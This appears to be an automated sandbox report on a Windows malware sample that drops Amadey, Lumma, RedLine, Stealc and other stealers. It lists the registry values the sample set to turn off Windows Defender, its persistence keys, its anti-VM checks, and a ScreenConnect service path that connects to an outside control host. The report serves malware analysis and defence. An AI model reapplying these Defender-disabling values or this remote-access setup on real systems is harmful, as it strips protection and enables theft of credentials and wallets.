Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Healer family

healer

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" N/A N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" N/A N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection N/A N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" N/A N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" N/A N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (3be09d9e5e840c20)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=bbcnas2.zapto.org&p=8041&s=5e07fdea-2445-4cdf-b446-9468459e62fc&k=BgIAAACkAABSU0ExAAgAAAEAAQBdpn0O4B1VqMLUD0QDsNyYTlq4tRTm9ACUnnSMesFZALDh%2bLgBUwyTJ9D684SXejMRZmxv0Ws0vI2HDF%2f3pgx%2bIGwSyAZ%2fcl0w71rKbKyIIKYDZKbnkGgXvWGAi3ZyQp5OOPPQACb3KOn3dbHGC7zVR4YxQG18q4ph%2fyqoczab4g1p0ctN9m9IinVuQ4spX2nQNInOfCqxjvWdinItao7pk9fPOEV6qP3zSVfOwlnLHbRaASXeN%2fudvdB8e5o68h%2bjKG6VwXtszNJDCo7VtQqZmoYLmAVq9dmcJjckjVt0p%2bJPysj6usBrEV3AzT%2ff7W%2bYHYQ0svZBekSGOWFY8kLf&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAHb%2bs1pY9TUyROCm01HafegAAAAACAAAAAAAQZgAAAAEAACAAAAABQhqPewHQ8XlRhI0oneysKXh4DGzBUqONYoTSr%2bO6DQAAAAAOgAAAAAIAACAAAADEoC%2fLK3a1j91yLilSRur3hMPwFboE691x4m7xXSVe7KAEAACoNsZ%2f77gmKCEE91ZoKUHXAnjziW7eiTlFM6DHqLWZIM14v%2bgkf297bTIX4pjnToafPGf5SMsELVph4dmBKDnwVRERrXJqWaz07Zq4sQIBelC9Cb3Ub0Jf%2fqvtBqtQ%2bz9JnM7vN%2f4q4MwB6zE9apFFiZec1p%2fPltAGLFJwpDRVHRAe%2b9zt7mVKPr2dwWijC8FI6ItGIezl2BXNtYQj1Z5iYp7LJeBddoIn2AyaMhQKPcmrRqoA4Vh1ZS9uM50mvYqZV0fvq5cNbt45k2pczFtFa3L4xGO7BxuHB%2fQqGzva5x4nIxoKCCC1%2fOSvFUHSb3J2egDxvBIDn5sxPG%2bcd3DQQKrUtiUFQGYcqWx4tXABYgFshfkbTZ5gOJRCY5zmZSMHpFq5mwoCQv2JHzf2OQEuYDCF9TX3E6DAzpNlIbCVzPcsni30KxCDMR58kEDsij%2f0hzZvuHRbypCAW8K8QoOfGkku9PKMWAt823%2fn%2f%2bBxxUyHOEkZwKrL1nkj7Kkcn%2bLKHaaszB0dQZDFWtzSIaGIjswJoSOrecjsS8Fpdhi1b4FDm%2fK5IIMkOT0RyaVPjDBbBlxk3jzbqZhOPoEgAzZnaQoYVMSiZojgXhJF%2bFpIfvCzb2xvYyd9IvQfmczJ%2b3cEqqb6rdOij8G4zmu7vJrH0JOyQWLOCMeZCa7L88TcuDfJNdyt4ZcwZA5JiVnsDxQnSkdO%2f%2bi8fGqjmZt1XQy7qDHzdg9VYEopUnrhzWgUy7L7ImFgr7YC1CswwrkrCILxLLXtGK6s5O%2bp2luXRvppeh7jLSAW5u%2buk%2fZyXf1lKxc4oOFUevNzrNi58u%2bXm3YahJhyTV0QSleh1fhpMsTbxnASVeURZ2DEgeHmapBib7dNbdNcSdZO45u8%2fu94ClF5wRgU77wGftsX84nSLgw19JFgKWB2xc0KCk9B%2feND4%2bIQuIL3AIhtLn9kKJcvK%2bGzwOaFX4gHuHUr3zclC665Fv8%2fJhwikf4mIsyVqR0E1jT0kembb7SSqSq6cQUxiKtlfX5LkBfcsOMuysbPorwWZTMGWwevZYcamVVhzQB1%2fSxw4vzbiXQEKMzF3lhEZgQ1pMDsvzSBjGAEa7gvAi23LYcWutRUqr82EZiGONsKyH2xe46lVDUmwMHw0jS753PEpp8XaP5Ki4%2fnJco7W8bMOmDd4MrOjgzjtSkGlJZFih7spsQ3OTr44v%2fdQ%2fHtoLz3HSMOmPNMTL0Oi1775lfmAIYUnlYenGtuCcYDFU9VUdDPifWFqHgsvXsIX%2bz3nq%2f37B0Ya9xv%2fdTXDSaiX2GlEzM4JsMyZOeWRgBAVH0xw%2f%2fNJm91RjNeIO9XE4EXCI4XIAtOmeYKcb%2bidvXXecM2l%2fD6kZTKOKKMKzMabYMlPyPxHCkkZ%2bmwf9WXHp%2bbhIwNtZt%2bwUZbCMUAeubBWjwxcrpYKCLFA0ueZvNKaRfk4BX%2bcqVrsmaPH6GjYLadGGotL4xTpj0868Ilx%2b3EG2e8Z98hofyOYqPCyhld7dCiEXR8C8PrS797YJI%2feOtoKhDjett5xxZIuHpf6AtVo8gJK8q5%2fJqzO%2fUcQWwfsGpTDUAAAABRSozwxK4n6B5CeWmqReXZeC8ynYM09Ms9E1GZ442mc7kRZvcawMas%2fW%2fhXd%2fnhjO%2fW14gSFpXFeK7YUP0VkNC&c=test&c=&c=&c=&c=&c=&c=&c=\"" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation N/A N/A
Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation N/A N/A
Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation N/A N/A
Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation N/A N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4284dc1285.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035810101\\4284dc1285.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035820121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c0fb027e93.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10036490101\\c0fb027e93.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\325e33a3f3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10036500101\\325e33a3f3.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a68f071a5f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10036510101\\a68f071a5f.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Boot or Logon Autostart Execution: Authentication Package

persistence privilege_escalation
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800330062006500300039006400390065003500650038003400300063003200300029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\zvpiqfek.tmp C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\zvpiqfek.newcfg C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
